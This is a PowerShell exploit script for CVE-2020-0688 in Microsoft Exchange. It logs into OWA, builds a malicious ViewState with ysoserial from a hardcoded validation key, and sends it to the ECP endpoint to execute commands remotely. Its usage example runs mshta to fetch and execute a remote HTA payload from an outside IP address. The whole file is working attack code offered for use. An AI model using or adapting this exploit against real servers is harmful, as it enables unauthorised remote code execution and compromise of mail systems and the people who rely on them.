1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
| function exchange
{
param(
[alias("Help")][switch]$h=$false,
[alias("server")][String]$s,
[alias("username")][String]$u,
[alias("password")][String]$p,
[alias("command")][String]$c
)
$Help = "
CVE-2020-0688 EXP
Usage: exchange [-h] -s SERVER -u USER -p PASSWORD -c CMD
Examples:
exchange -s https://mail.x.com/ -u user@x.com -p passwd -c `"cmd.exe /c mshta http://1.1.1.1/test.hta`"
"
if(!$s){return $Help}
if(!$u){return $Help}
if(!$p){return $Help}
if(!$c){return $Help}
if($h){return $Help}
[Reflection.Assembly]::LoadWithPartialName("System.Web") | Out-Null
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
$url =$s
$target="$s/owa/auth.owa"
$destination=[uri]::EscapeDataString("$url/ecp/")
$username=$u
$pass=$p
$command=$c
$VIEWSTATEGENERATOR='B97B4E27'
$validationkey = 'CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF'
$postData="flags=4&password=$pass&destination=$destination&passwordText=&isUtf8=1&username=$username&forcedownlevel=0"
$CookieContainer = New-Object System.Net.CookieContainer
$buffer = [text.encoding]::ascii.getbytes($postData)
[net.httpWebRequest] $req = [net.webRequest]::create($target)
$req.method = "POST"
$req.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
$req.Headers.Add("Accept-Language: zh-CN,zh;q=0.9,en;q=0.8")
$req.Headers.Add("Accept-Encoding: gzip, deflate, br")
$req.Headers.Add("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7")
$req.Headers.Add("Origin: $url")
$req.Headers.Add("Sec-Fetch-Dest: document")
$req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36"
$req.AllowAutoRedirect = $true
$req.MaximumAutomaticRedirections= 1
$req.ContentLength = $buffer.length
$req.TimeOut = 50000
$req.KeepAlive = $true
$req.CookieContainer = $CookieContainer
$reqst = $req.getRequestStream()
$reqst.write($buffer, 0, $buffer.length)
$reqst.flush()
$reqst.close()
[net.httpWebResponse] $res = $req.getResponse()
$SessionId=($res.Cookies['ASP.NET_SessionId']).value
$resst = $res.getResponseStream()
$sr = new-object IO.StreamReader($resst)
$result = $sr.ReadToEnd()
$res.close()
$l=($res.ResponseUri.LocalPath)
if ($l -like '/owa/auth/logon.aspx'){
write-host "[!] Login Incorrect, please try again with a different account..`n"
break
}
write-host "[+] Login successfully!`n`n"
write-host "Exec: .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$SessionId`" --isdebug -islegacy`n"
$yso= .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$SessionId`" --isdebug –-islegacy
$generator=$yso -match "^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$"
$Encode = [System.Web.HttpUtility]::UrlEncode($generator)
write-host "[+] Exp url:" +"$url/ecp/default.aspx?__VIEWSTATEGENERATOR=$VIEWSTATEGENERATOR&__VIEWSTATE=$Encode"
$url2="$url/ecp/default.aspx?__VIEWSTATEGENERATOR=$VIEWSTATEGENERATOR&__VIEWSTATE=$Encode"
try {
[net.httpWebRequest] $req2 = [net.webRequest]::create($url2)
$req2.Method = "GET"
$req2.Accept = "text/html"
$req2.AllowAutoRedirect = $fals
$req2.CookieContainer = $CookieContainer
$req2.TimeOut = 50000
[net.httpWebResponse] $res2 = $req2.getResponse()
write-host "[-] Failed!"
}catch [System.Net.WebException] {
write-host "[*] Status code: 500, Maybe success!"
}
}
exchange
|
